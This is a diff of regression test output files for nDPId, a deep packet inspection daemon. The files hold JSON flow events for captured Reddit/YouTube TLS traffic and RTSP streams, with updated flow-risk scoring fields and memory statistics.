+00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1605291687642,"flow_last_seen":1605291687853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":36007,"flow_avg_l4_payload_len":521,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605291688830,"flow_last_seen":1605291698440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":18805,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}}
+00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":146,"flow_first_seen":1605291687485,"flow_last_seen":1605291690985,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":121491,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
+00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1605291688324,"flow_last_seen":1605291688572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6036,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291696948,"flow_last_seen":1605291697249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7617,"flow_avg_l4_payload_len":331,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688336,"flow_last_seen":1605291688453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4038,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
+00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":174,"flow_first_seen":1605291688831,"flow_last_seen":1605291698470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3624,"flow_tot_l4_payload_len":123775,"flow_avg_l4_payload_len":711,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}}
+00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1605291684451,"flow_last_seen":1605291698602,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8332,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291684451,"flow_last_seen":1605291684592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":4078,"flow_avg_l4_payload_len":214,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1605291687761,"flow_last_seen":1605291687902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5000,"flow_avg_l4_payload_len":238,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1605291687933,"flow_last_seen":1605291688585,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":14745,"flow_avg_l4_payload_len":335,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690926,"flow_last_seen":1605291691119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":181,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1605291686985,"flow_last_seen":1605291690314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2776,"flow_tot_l4_payload_len":41240,"flow_avg_l4_payload_len":564,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291688712,"flow_last_seen":1605291688927,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5005,"flow_avg_l4_payload_len":161,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
+00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":636,"flow_first_seen":1605291687931,"flow_last_seen":1605291698785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7248,"flow_tot_l4_payload_len":748553,"flow_avg_l4_payload_len":1176,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291687896,"flow_last_seen":1605291688326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6703,"flow_avg_l4_payload_len":216,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1605291690926,"flow_last_seen":1605291691154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10872,"flow_tot_l4_payload_len":111125,"flow_avg_l4_payload_len":1068,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":305,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8555,"flow_avg_l4_payload_len":305,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":316,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691044,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8557,"flow_avg_l4_payload_len":316,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1605291686985,"flow_last_seen":1605291698522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2333,"flow_tot_l4_payload_len":45370,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291690373,"flow_last_seen":1605291690520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5684,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00159{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","total-events-serialized":446}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 11682/11682
@@ -452,10 +452,10 @@
 ~~ total active/idle flows...: 60/60
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5233967 bytes
-~~ total memory freed........: 5233967 bytes
-~~ total allocations/frees...: 111726/111726
+~~ total memory allocated....: 5299568 bytes
+~~ total memory freed........: 5299568 bytes
+~~ total allocations/frees...: 113316/113316
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 164 chars
-~~ json string max len.......: 1431 chars
-~~ json string avg len.......: 867 chars
+~~ json string max len.......: 1457 chars
+~~ json string avg len.......: 880 chars
diff --git a/test/results/rtsp.pcap.out b/test/results/rtsp.pcap.out
index 845213572..b6b0e812e 100644
--- a/test/results/rtsp.pcap.out
+++ b/test/results/rtsp.pcap.out
@@ -1,46 +1,46 @@
 00436{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"rtsp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"ts_msec":1627567277506,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="}
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"ts_msec":1627567277506,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="}
 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"ts_msec":1627567277506,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAAL1W3kAAfwaNTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="}
 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567279015,"flow_last_seen":1627567279015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1627567279015,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1627567279015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567279015,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1627567279015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567279015,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1627567279015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567279015,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRW5UAAfwaN0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="}
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567279015,"flow_last_seen":1627567279029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1627567279029,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567279015,"flow_last_seen":1627567279029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1627567279029,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567338841,"flow_last_seen":1627567338841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1627567338841,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1627567338841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567338841,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="}
